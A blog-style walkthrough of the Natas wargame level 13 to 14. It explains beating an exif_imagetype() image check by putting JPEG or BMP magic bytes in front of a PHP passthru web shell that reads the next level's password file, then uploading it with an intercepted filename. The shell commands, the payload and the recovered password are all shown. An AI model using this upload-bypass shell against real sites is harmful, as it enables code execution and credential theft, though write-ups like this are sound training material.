Natas Level 13 → Level 14

The source code for the php looks almost the same except there is additional condition to check for an image file in the main program using exif_imagetype().

<? 

...

if(array_key_exists("filename", $_POST)) { 
 $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]); 

 if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) { 
 echo "File is too big"; 
 } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) { 
 echo "File is not an image"; 
 } else { 
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
 echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded"; 
 } else{ 
 echo "There was an error uploading the file, please try again!"; 
 } 
 } 
} else { 
?> 

<form enctype="multipart/form-data" action="index.php" method="POST"> 
<input type="hidden" name="MAX_FILE_SIZE" value="1000" /> 
<input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" /> 
Choose a JPEG to upload (max 1KB):<br/> 
<input name="uploadedfile" type="file" /><br /> 
<input type="submit" value="Upload File" /> 
</form> 
<? } ?>

What exif_imagetype() does is reads the first bytes of an image and checks its signature. If we use the same strategy from our last level, we will greet with a message “For security reasons, we now only accept images files! File is not an image”. So we need to fool exif_imagetype() by uploading a file that looks like an image but it is other type.

Google file signature will show that jpg/jpeg file has a signature of “FF D8 FF” with 0 Offset. If we put this value at the very beginning of our last solution, it can fool exif_imagetype().

First we create the jpg heading using echo in linux and save it to any file.

echo -e "\xff\xd8\xff" > natas13.jpg

Then we reuse our php file from last time, rename the file to natas13.php and change the password file from natas13 to natas14.

<?php
 echo passthru("cat /etc/natas_webpass/natas14");
?>

Finally, we combine then as one file.

cat natas13.jpg natas13.php > natas13f.php

Now we will repeat what we did in last challenge by uploading this file. Intercept it to change the filename before forwarding it to the server. Before clicking the link, make sure to intercept the response from server as well. Click the link and the response in burp will show the next password even though in the browser it shown as a broken image (ie).

 Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Note: I later found out that it was checking for any image file signature, not just jpg. Therefore, we can actually put “BM” (\x42\x4d) which is the signature for BMP at the beginning of our php file without doing any bash to modify the beginning of the file.

Additional resource:

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s